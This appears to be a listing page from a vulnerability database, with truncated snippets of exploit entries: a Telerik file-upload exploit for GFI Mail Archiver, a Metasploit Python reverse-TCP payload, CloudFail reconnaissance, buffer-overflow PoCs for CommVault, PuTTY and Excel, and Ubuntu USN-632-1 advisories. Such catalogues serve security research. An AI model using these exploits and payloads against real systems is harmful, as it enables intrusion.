GFI Mail Archiver 15.1 - Telerik UI Component Arbitrary File Upload (Unauthenticated) Exploit

Exploit Title: GFI Mail Archiver 15.1 - Telerik UI Component Arbitrary File Upload Unauthenticated Exploit Author: Amin Bohio Original Research & Code By: Paul Taylor / Foregenix Ltd Original Exploit: https://github.com/bao7uo/RAUcrypto Vendor Homepage: https://www.gfi.com Software Link:...

Python Pingback, Reverse TCP (via python)

Connects back to the attacker, sends a UUID, then terminates module MetasploitModule CachedSize = :dynamic include Msf::Payload::Single include Msf::Payload::Python include Msf::Payload::Pingback include Msf::Payload::Pingback::Options def initializeinfo = supermergeinfoinfo, 'Name' = 'Python...

CloudFail - Utilize misconfigured DNS and old database records to find hidden IP's behind the CloudFlare network

CloudFail is a tactical reconnaissance tool which aims to gather enough information about a target protected by CloudFlare in the hopes of discovering the location of the server. Using Tor to mask all requests, the tool as of right now has 3 different attack phases. 1. Misconfigured DNS scan usin...

CommVault Edge 11 SP6 - Stack Buffer Overflow (PoC) Exploit

Exploit for windows platform in category dos / poc import socket import binascii import time import struct s = socket.socketsocket.AFINET, socket.SOCKSTREAM s.settimeout1 s.connect"10.101.0.85", 8400 def srp=None, r=None: if p: print "sending %d bytes: %s " % lenp/2,p payl = binascii.a2bhexp...

CommVault Edge 11 SP6 - Stack Buffer Overflow (PoC)

CommVault Edge 11 SP6 - Stack Buffer Overflow PoC import socket import binascii import time import struct s = socket.socketsocket.AFINET, socket.SOCKSTREAM s.settimeout1 s.connect"10.101.0.85", 8400 def srp=None, r=None: if p: print "sending %d bytes: %s " % lenp/2,p payl = binascii.a2bhexp...

Putty 0.60 Crash PoC

No description provided by source. print \n print ---------------------------------------------------------------- print | putty 0.60 Null Ptr | print | Level Smash the Stack | print ---------------------------------------------------------------- print \n import sys, socket, binascii HOST =...

Microsoft Excel - 0x5D record Stack Overflow (MS10-038)

Microsoft Excel - 0x5D record Stack Overflow MS10-038 This is an exploit for MS10-038/CVE-2010-0822 Everything is hardcoded! winxp sp3 webDEViL w3bd3vilatgmaildot.com http://krash.in/excel1.xls Office 2007 - 12.0.4518.1014 MS10-038 bulletin states that Office 2007 is not vulnerable, lol import...

Ubuntu Update for python2.4, python2.5 vulnerabilities USN-632-1

Ubuntu Update for Linux kernel vulnerabilities USN-632-1 OpenVAS Vulnerability Test $Id: gbubuntuUSN6321.nasl 7969 2017-12-01 09:23:16Z santu $ Ubuntu Update for python2.4, python2.5 vulnerabilities USN-632-1 Authors: System Generated Check Copyright: Copyright c 2009 Greenbone Networks GmbH,...

Ubuntu: Security Advisory (USN-632-1)

The remote host is missing an update for the SPDX-FileCopyrightText: 2009 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

USN-632-1: Python vulnerabilities

It was discovered that there were new integer overflows in the imageop module. If an attacker were able to trick a Python application into processing a specially crafted image, they could execute arbitrary code with user privileges. CVE-2008-1679 Justin Ferguson discovered that the zlib module di...